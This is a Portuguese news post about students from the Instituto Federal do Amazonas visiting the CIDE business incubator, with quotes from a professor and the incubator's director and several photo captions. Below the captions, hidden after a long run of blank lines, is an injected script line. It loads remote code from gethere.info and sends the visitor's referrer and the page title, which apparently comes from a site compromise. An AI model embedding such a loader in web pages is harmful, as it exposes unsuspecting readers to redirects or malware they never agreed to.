Estudantes têm aula complementar no CIDE

Estudantes do Instituto Federal do Amazonas (Ifam) conhecem o CIDE
Estudantes do Instituto Federal do Amazonas (Ifam) conhecem o CIDE

 

Vários estudantes da disciplina de Empreendedorismo do Instituto Federal do Amazonas (Ifam), do Campus do Distrito Industrial, estiveram na tarde de hoje, 22, visitando o Centro de Incubação e Desenvolvimento Empresarial (CIDE), para conhecer a estrutura da incubadora e conversar com alguns empreendedores.

Segundo a professora Márcia Maria Bacovis, a visita serviu para que os estudantes conhecessem as atividades da incubadora e ouvissem as histórias de empreendedorismo dos empresários instalados. “Visitar uma incubadora, significa também incentivar os estudantes à inovação, ao empreendedorismo, às mudanças na sociedade, criando novos produtos e desenvolvendo atividades que atendam as demandas da população”, diz Bacovis.

Para o diretor executivo do CIDE, José Barbosa Grosso, as visitas à incubadora engrandecem aos estudantes e são importantes para os empreendedores. “Todos crescemos com essas visitas. Os estudantes aprendem, os empresários ensinam e aprendem também porque as perguntas dos visitantes estimula a novos desafios”, diz.

Estudantes do Ifam, ao sair de uma empresa, no CIDE.
Estudantes do Ifam, ao sair de uma empresa, no CIDE.

 

Fotov8
Estudantes do Ifam provam licores.
Fotov1
Estudantes do Ifam ouvem palestra.

 

Estudantes do Ifam em empresa de temperos, no CIDE.
Estudantes do Ifam em empresa de temperos, no CIDE.

 

 

 

 

 

 

 

 

 

 

 

 

 

 

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Deixe uma resposta

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *